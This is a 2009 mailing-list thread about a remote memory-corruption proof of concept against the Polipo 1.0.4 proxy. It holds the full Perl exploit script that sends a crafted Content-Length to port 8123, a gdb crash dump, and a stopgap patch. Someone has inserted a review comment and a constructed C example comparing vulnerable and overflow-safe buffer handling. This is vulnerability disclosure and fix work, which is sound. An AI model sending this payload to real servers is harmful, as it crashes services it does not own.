Re: polipo POC

2009-12-09 Thread Jacob Appelbaum
Darren Thurston wrote:
 
 #!/usr/bin/perl
 # estranged.pl
 # AKA
 # Polipo 1.0.4 Remote Memory Corruption 0day PoC

Cute.

 $payload = "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n";
 

The proof of concept works as advertised. Wheee.

Here's a simple patch (that probably breaks some requests and is
imperfect) to stop the proof of concept while we wait on upstream to
provide a real fix for it:

--- polipo-1.0.4/client.c   2008-01-08 14:56:45.0 +0200
+++ polipo-1.0.4-fixed/client.c 2009-12-09 15:30:53.0 +0200
@@ -998,7 +998,7 @@
 return 1;
 }

-if(connection-reqlen  connection-reqbegin) {
+if(connection-reqlen  connection-reqbegin  (connection-reqlen
- connection-reqbegin )  0 ) {
 memmove(connection-reqbuf, connection-reqbuf +
connection-reqbegin,
 connection-reqlen - connection-reqbegin);
 connection-reqlen -= connection-reqbegin;
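
Review bot: the added subtraction term in the new condition only rejects the PoC because the subtraction itself wraps: when reqbegin has gone negative by the amount the register dump shows (eax = -2147483648), reqlen - reqbegin overflows int and comes out negative, so the guard fails. That is signed overflow, so a compiler is free to fold `a > b && (a - b) > 0` back into `a > b` and silently drop the check. Bound the offset explicitly before this block instead, e.g. `if(connection->reqbegin < 0 || connection->reqbegin > connection->reqlen) { /* reset the buffer or drop the connection */ }`, and reject a Content-Length that does not fit an int where it is parsed, so reqbegin can never be advanced past reqlen in the first place.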

Using memmove like that is extremely unsafe. :-(

Best,
Jacob





polipo POC

2009-12-08 Thread Darren Thurston


#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
#
# Jeremy Brown [0xjbrow...@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009
#
# *
#
# Hzzp loves you Polipo!
#
# No use reporting this issue to Ubuntu Security unless you feel like waiting two weeks for them to sit on
# it, then UNFLAG security issue and call it a feature.
#
# I informally request that they apologize to the developers themselves x)
#
# polipo-20080907/client.c [1001-1009]:
#
# if(connection->reqlen > connection->reqbegin) {
# memmove(connection->reqbuf, connection->reqbuf + connection->reqbegin,
# connection->reqlen - connection->reqbegin);
# connection->reqlen -= connection->reqbegin;
# connection->reqbegin = 0;
# } else {
# connection->reqlen = 0;
# connection->reqbegin = 0;
# }
#
# 0.9.8 / 1.0.4 tested vulnerable
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40093486 in memmove () from /lib/libc.so.6
# (gdb) i r
# eax            0x80000000 -2147483648
# ecx            0x22
# edx            0x8000002c -2147483604
# ebx            0x80775d8  134706648
# esp            0xb7f0     0xb7f0
# ebp            0xb7f8     0xb7f8
# esi            0x4017002d 1075249197
# edi            0xc017002d -1072234451
# eip            0x40093486 0x40093486
# eflags         0x10686    67206
# cs             0x23       35
# ss             0x2b       43
# ds             0x2b       43
# es             0x2b       43
# fs             0x0        0
# gs             0x0        0
# (gdb) bt
#0  0x40093486 in memmove () from /lib/libc.so.6
#1  0x0805a594 in ?? ()
#2  0x4017 in ?? ()
#3  0xc017 in ?? ()
#4  0x802e in ?? ()
#5  0x0804e744 in ?? ()
#6  0x08077548 in ?? ()
#7  0x08077550 in ?? ()
#8  0x0001 in ?? ()
#9  0x000a in ?? ()
#10 0x0001 in ?? ()
#11 0x080775d8 in ?? ()
#12 0xb908 in ?? ()
#13 0x0805a458 in ?? ()
#14 0x08077498 in ?? ()
#15 0x0001 in ?? ()
#16 0x0001 in ?? ()
#17 0x0001 in ?? ()
#18 0x0001 in ?? ()
#19 0x0805eb8d in ?? ()
#20 0x in ?? ()
#21 0xb8d0 in ?? ()
#22 0xb8ac in ?? ()
#23 0xb8b0 in ?? ()
#24 0x in ?? ()
#25 0x in ?? ()
#26 0x in ?? ()
#27 0x in ?? ()
#28 0x in ?? ()
#29 0x in ?? ()
#30 0x in ?? ()
#31 0x in ?? ()
#32 0xb8b4 in ?? ()
#33 0xb8c0 in ?? ()
#34 0x in ?? ()
#35 0x in ?? ()
#36 0xb8b8 in ?? ()
#37 0xb8bc in ?? ()
#38 0x40170003 in ?? ()
#39 0x0806f803 in _IO_stdin_used ()
#40 0x08077550 in ?? ()
#41 0x4008dc91 in mallopt () from /lib/libc.so.6
# Previous frame inner to this frame (corrupt stack?)
# (gdb)
#
# (gdb) x/i $eip
# 0x40093486 <memmove+102>:  repz movsb %ds:(%esi),%es:(%edi)
#
# And my hair cannot commit, to one popular genre of music
#
# *
# estranged.pl

use strict;
use warnings;
use IO::Socket;

my $target = $ARGV[0] or die "usage: $0 <target>\n";
my $port   = 8123;    # polipo's default listening port

# One request header with an oversized Content-Length and no body: the
# value below is the one that reaches the memmove in client.c with a
# corrupted length (see the gdb session above).
my $payload = "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n";

my $sock = IO::Socket::INET->new(Proto => 'tcp', PeerHost => $target, PeerPort => $port)
    or die "Error: $target:$port\n";
$sock->send($payload);

close($sock);
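The register dump above shows why the PoC's Content-Length does the damage: by the time memmove runs, the offset (eax = -2147483648) is negative and the length (edx = -2147483604) is a negative int reinterpreted as a huge size_t. The C below is an added, constructed example, not Polipo's code, that reproduces that arithmetic on the PoC's own request bytes and sets it beside an overflow-safe version of the same compaction step. It assumes the offset is advanced by simply adding the declared body length to reqbegin in int arithmetic (the PoC quotes only the memmove block, not the line that advances reqbegin, so that part is an assumption about how the offset goes negative); the struct, the helper names, and the two sample requests are all made up for the demo.

```c
/* Constructed example: polipo-style request-buffer compaction with the
 * int wrap the PoC triggers, beside an overflow-safe version. Not Polipo's
 * code; the struct and helpers are stand-ins invented for this demo. */
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REQBUF_SIZE 4096

/* Stand-in for the connection fields the PoC targets; both offsets are
 * plain int, as in client.c. */
struct conn {
    char reqbuf[REQBUF_SIZE];
    int reqlen;    /* bytes currently held in reqbuf */
    int reqbegin;  /* offset of the first byte not yet consumed */
};

/* Constructed sample inputs: the PoC's request, and a pipelined pair. */
static const char POC_REQUEST[] =
    "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n";
static const char PIPELINED[] =
    "POST / HTTP/1.1\r\nContent-Length: 5\r\n\r\nhelloGET /next HTTP/1.1\r\n\r\n";

/* Load a raw request and consume its header block (reqbegin lands just
 * past the blank line). Returns the Content-Length, or -1 if absent.
 * Deliberately minimal parser, enough for the two samples above. */
static long long load_request(struct conn *c, const char *raw) {
    size_t n = strlen(raw);
    if (n >= REQBUF_SIZE) n = REQBUF_SIZE - 1;
    memcpy(c->reqbuf, raw, n);
    c->reqbuf[n] = '\0';
    c->reqlen = (int)n;
    const char *end = strstr(c->reqbuf, "\r\n\r\n");
    c->reqbegin = end ? (int)(end - c->reqbuf) + 4 : c->reqlen;
    const char *cl = strstr(c->reqbuf, "Content-Length:");
    return cl ? strtoll(cl + strlen("Content-Length:"), NULL, 10) : -1;
}

/* Vulnerable shape (assumed): skip the body by adding its length to
 * reqbegin, then compact when reqlen > reqbegin. The addition is done in
 * uint32_t so the demo has defined behaviour, but the result is what a
 * 32-bit int build sees: begin wraps to INT_MIN, the guard passes, and the
 * subtraction yields the 0x8000002e-style length. Nothing is moved; the
 * function returns the 32-bit size memmove would receive, 0 on the else path. */
static uint32_t vulnerable_compact_len(const struct conn *c, long long body_len) {
    int begin = (int)((uint32_t)c->reqbegin + (uint32_t)body_len); /* wraps */
    if (c->reqlen > begin)                       /* true once begin went negative */
        return (uint32_t)c->reqlen - (uint32_t)begin;
    return 0;
}

/* Overflow-safe version: reject a Content-Length that cannot fit an int,
 * never advance reqbegin past reqlen, and derive the memmove length only
 * from bytes actually present. Returns the body bytes still expected on
 * the wire (0 when the whole body was buffered), or -1 if rejected. */
static long long safe_skip_body(struct conn *c, long long body_len) {
    if (body_len < 0 || body_len > INT_MAX)
        return -1;
    int avail = c->reqlen - c->reqbegin;         /* buffered bytes past the header */
    if (body_len >= avail) {                     /* body not (fully) buffered: drop all */
        long long remaining = body_len - avail;
        c->reqlen = 0;
        c->reqbegin = 0;
        return remaining;
    }
    c->reqbegin += (int)body_len;                /* body_len < avail: cannot overflow */
    memmove(c->reqbuf, c->reqbuf + c->reqbegin, (size_t)(c->reqlen - c->reqbegin));
    c->reqlen -= c->reqbegin;
    c->reqbegin = 0;
    return 0;
}

int main(void) {
    struct conn c;
    long long cl = load_request(&c, POC_REQUEST);
    uint32_t bad = vulnerable_compact_len(&c, cl);
    printf("PoC: reqlen=%d reqbegin=%d Content-Length=%lld\n", c.reqlen, c.reqbegin, cl);
    printf("  vulnerable path would memmove %u (0x%08x) bytes\n", bad, bad);
    printf("  safe path: %lld body bytes still expected, reqlen=%d\n",
           safe_skip_body(&c, cl), c.reqlen);
    cl = load_request(&c, PIPELINED);
    safe_skip_body(&c, cl);
    printf("pipelined: %d bytes kept for the next request: %.*s\n",
           c.reqlen, c.reqlen, c.reqbuf);
    return 0;
}
```

The point of the safe version is that the length handed to memmove is computed from reqlen and a reqbegin that is bounded by reqlen, so no value in the Content-Length header can reach the copy; the header value only decides how many future bytes to discard.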

***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talk in the body. http://archives.seul.org/or/talk/